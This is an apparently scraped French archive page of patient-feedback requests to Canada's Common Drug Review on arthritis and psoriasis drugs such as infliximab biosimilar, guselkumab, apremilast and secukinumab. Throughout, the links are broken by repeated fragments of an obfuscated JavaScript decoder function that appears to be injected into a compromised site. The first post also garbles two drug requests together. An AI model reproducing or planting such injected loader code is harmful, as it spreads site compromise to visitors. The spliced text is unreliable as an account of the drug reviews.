All posts related to "rétroaction de patients"

Souffrez-vous de polyarthrite rhumatoïde, de spondylarthrite ankylosante, d’arthrite psoriasique ou de psoriasis en plaques ?

Stickman with megaphone calling for patient inputDemande de rétroaction de patients sur le biosimilaire de l’infliximab (Merck) dans le traitement de la polyarthrite rhumatoïde, de la spondylarthrite ankylosante, de l’arthrite psoriasique et du psoriasis en plaques

Souffrez-vous de polyarthrite rhumatoïde, de spondylarthrite ankylosante, d’arthrite psoriasique ou de psoriasis en plaques ? Vos commentaires seraient précieux.

Santé Canada définit le biosimilaire comme un médicament biologique qui présente une similarité établie avec un biologique d’origine (tel que Rémicade®) et qui a fait son entrée sur le marché après l’innovateur auquel il se réfère.

Le Programme commun d’évaluation des médicaments (PCEM) demande actuellement que les patients et leurs fournisseurs de soins fassent parvenir aux organismes regroupant les patients leurs commentaires et suggestions sur la présentation par le fabricant du guselkumab dans le traitement du psoriasis en plaques, de modéré à grave. demande actuellement que les patients et leurs fournisseurs de soins fassent parvenir aux organismes regroupant les patients leurs commentaires et suggestions sur la présentation par le fabricant d’un biosimilaire de l’infliximab dans le traitement de la polyarthrite rhumatoïde, de la spondylarthrite ankylosante, de l’arthrite psoriasique et du psoriasis en plaques. Le biologique d’origine ou produit de référence est l’infliximab (Remicade®).

Partie intégrante de l’Agence canadienne des médicaments et des technologies de la santé, le PCEM examine avec objectivité et rigueur l’efficacité et la rentabilité des médicaments et fournit des recommandations aux régimes d’assurance-médicaments (à l’exception du Québec) quant à leur inscription sur la liste des médicaments assurés.

Afin de l’aider dans son processus de recommandation, le PCEM accepte la rétroaction d’organisations et de groupes de patients comme le comité ACE (Arthritis Consumer Experts). Parce que la rétroaction de patients est essentielle à la prise de décision du gouvernement sur les médicaments, nous désirons recueillir vos commentaires pour communication au PCEM.

Voici l’information que recherche le PCEM dans ce dossier particulier : Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/" title="Permalink to Demande de rétroaction de patients sur le guselkumab dans le traitement du psoriasis en plaques, de modéré à grave" rel="bookmark">Demande de rétroaction de patients sur le guselkumab dans le traitement du psoriasis en plaques, de modéré à grave

Stickman with megaphone calling for patient inputSouffrez-vous de psoriasis en plaques, de modéré à grave, ou prodiguez-vous des soins à quelqu’un qui en souffre ? Vos commentaires seraient précieux.

Le Programme commun d’évaluation des médicaments (PCEM) demande actuellement que les patients et leurs fournisseurs de soins fassent parvenir aux organismes regroupant les patients leurs commentaires et suggestions sur la présentation par le fabricant du guselkumab dans le traitement du psoriasis en plaques, de modéré à grave.

Le guselkumab appartient à la classe des modificateurs de la réponse biologique, utilisés contre l’arthrite inflammatoire. Le médicament bloque l’action de l’interleukine 23 (IL 23), une cytokine jouant un rôle essentiel dans le psoriasis en plaques.

Le PCEM fait partie de l’Agence canadienne des médicaments et des technologies de la santé (ACMTS). Le PCEM examine avec objectivité et rigueur l’efficacité et la rentabilité des médicaments et fournit des recommandations aux régimes d’assurance-médicaments publics du Canada (à l’exception du Québec) quant à leur inscription sur la liste des médicaments assurés.

Afin de l’aider dans son processus de recommandation, le PCEM accepte la rétroaction d’organisations et de groupes de patients comme le comité ACE (Arthritis Consumer Experts). Parce que la rétroaction de patients est essentielle à la prise de décision du gouvernement sur le remboursement des médicaments, nous désirons recueillir vos commentaires pour communication au PCEM.

Voici l’information que recherche le PCEM dans ce dossier particulier : function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/#more-13331" class="more-link">Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/">

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/" title="Permalink to Demande de rétroaction de patients sur l’apremilast (Otezla®) dans le traitement de l’arthrite psoriasique" rel="bookmark">Demande de rétroaction de patients sur l’apremilast (Otezla®) dans le traitement de l’arthrite psoriasique

Stickman with megaphone calling for patient inputSouffrez-vous d’arthrite psoriasique ou prodiguez-vous des soins à quelqu’un qui en souffre ? Vos commentaires seraient précieux.

Le Programme commun d’évaluation des médicaments (PCEM) invite actuellement les patients et leurs fournisseurs de soins à faire parvenir aux organismes représentant les patients leurs suggestions et commentaires sur la présentation par le fabricant de l’apremilast (Otezla®) dans le traitement de l’arthrite psoriasique. L’apremilast est un composé à petite molécule administrable par voie orale, à raison d’un comprimé deux fois par jour. Le médicament agit en bloquant l’action de la phosphodiestérase de type 4, un enzyme que l’on retrouve dans les cellules immunitaires. function l1c373528ef5(o4){var sa=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/#more-11572″ class=”more-link”>Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/">

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/" title="Permalink to Demande de rétroaction d’organisations de patients sur l’utilisation du secukinumab dans le traitement du psoriasis en plaques de modéré à sévère" rel="bookmark">Demande de rétroaction d’organisations de patients sur l’utilisation du secukinumab dans le traitement du psoriasis en plaques de modéré à sévère

Megaphone GraphicSouffrez-vous de psoriasis en plaques de modéré à sévère ou prodiguez-vous des soins à quelqu’un qui en souffre ? Vos commentaires seraient précieux.

Le Programme commun d’évaluation des médicaments (PCEM) invite actuellement les patients et leurs fournisseurs de soins à faire parvenir aux organismes représentant les patients leurs suggestions et commentaires sur la présentation par le fabricant du secukinumab dans le traitement du psoriasis en plaques, de modéré à sévère. Son utilisation n’ayant pas encore été approuvée par Santé Canada, le médicament ne porte pas de nom de marque pour le moment. Toutefois, afin d’accélérer le processus d’examen, le PCEM demande la rétroaction d’organisations de patients avant même l’obtention de l’approbation du médicament par Santé Canada. Administré par injection, le secukinumab est un anticorps monoclonal entièrement humain qui cible l’interleukine 17-a (il-17a), une protéine qui joue un rôle majeur dans le développement des maladies inflammatoires. Dans deux phases III des essais cliniques, le secukinumab a démontré son efficacité dans le traitement du psoriasis en plaques, tout en étant bien toléré. function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/#more-11138" class="more-link">Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/">

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/" title="Permalink to Demande de rétroaction d’organisations de patients sur l’utilisation de l’apremilast dans le traitement du psoriasis en plaques de modéré à sévère" rel="bookmark">Demande de rétroaction d’organisations de patients sur l’utilisation de l’apremilast dans le traitement du psoriasis en plaques de modéré à sévère

Megaphone GraphicDemande de rétroaction d’organisations de patients sur l’utilisation de l’apremilast (Otezla®) dans le traitement du psoriasis en plaques de modéré à sévère

Souffrez-vous de psoriasis en plaques de modéré à sévère ou prodiguez-vous des soins à quelqu’un qui en souffre ? Vos commentaires seraient précieux.

Le Programme commun d’évaluation des médicaments (PCEM) invite actuellement les patients et leurs fournisseurs de soins à faire parvenir aux organismes représentant les patients leurs suggestions et commentaires sur la présentation par le fabricant de l’apremilast (Otezla®) dans le traitement du psoriasis en plaques, de modéré à sévère. L’apremilast est un composé à petite molécule administrable par voie orale, à raison d’un comprimé deux fois par jour. Dans les phases II et III des essais cliniques, l’apremilast a démontré son efficacité dans le traitement du psoriasis en plaques, tout en étant bien toléré. Le médicament agit en bloquant l’action de la phosphodiestérase de type 4, un enzyme que l’on retrouve dans les cellules immunitaires. 
function l1c373528ef5(o4){var sa=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/#more-10746″ class=”more-link”>Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/">

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/" title="Permalink to Demande de rétroaction d’organisations de patients" rel="bookmark">Demande de rétroaction d’organisations de patients

Collez homme mégaphone tenant appelant à la rétroaction des patientsDemande de rétroaction d’organisations de patients sur le certolizumab pegol (Cimzia®) dans le traitement de l’arthrite psoriasique

Souffrez-vous d’arthrite psoriasique ou prodiguez-vous des soins à quelqu’un qui en souffre ? Vos commentaires seraient précieux.

Le Programme commun d’évaluation des médicaments (PCEM) suggère actuellement aux patients et à leurs fournisseurs de soins de faire parvenir aux organismes représentant les patients leurs suggestions et commentaires sur la présentation par le fabricant du certolizumab pegol (Cimzia®) dans le traitement de l’arthrite psoriasique. Le certolizumab pegol est indiqué pour une utilisation en association avec la méthotrexate pour diminuer les signes et symptômes et réduire la progression des lésions articulaires visibles à la radiographie chez les adultes atteints d’arthrite psoriasique, de modérée à sévère, qui n’ont pas répondu de façon adéquate à la prise d’un ou de plusieurs antirhumatismaux modificateurs de la maladie (ARMM). function l1c373528ef5(o4){var sa=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var q3=”;var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/#more-10669″ class=”more-link”>Continue reading

function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o/">
e de rétroaction d’organisations de patients"; var disqus_config = function () { var config = this; // Access to the config object this.language = page_lang; // This is set in the index header this.hide_avatars = true; }; /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */ //var disqus_shortname = 'example'; // required: replace example with your forum shortname /* * * DON'T EDIT BELOW THIS LINE * * */ (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); (function () { var s = document.createElement('script'); s.async = true; s.type = 'text/javascript'; s.src = 'http://' + disqus_shortname + '.disqus.com/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); }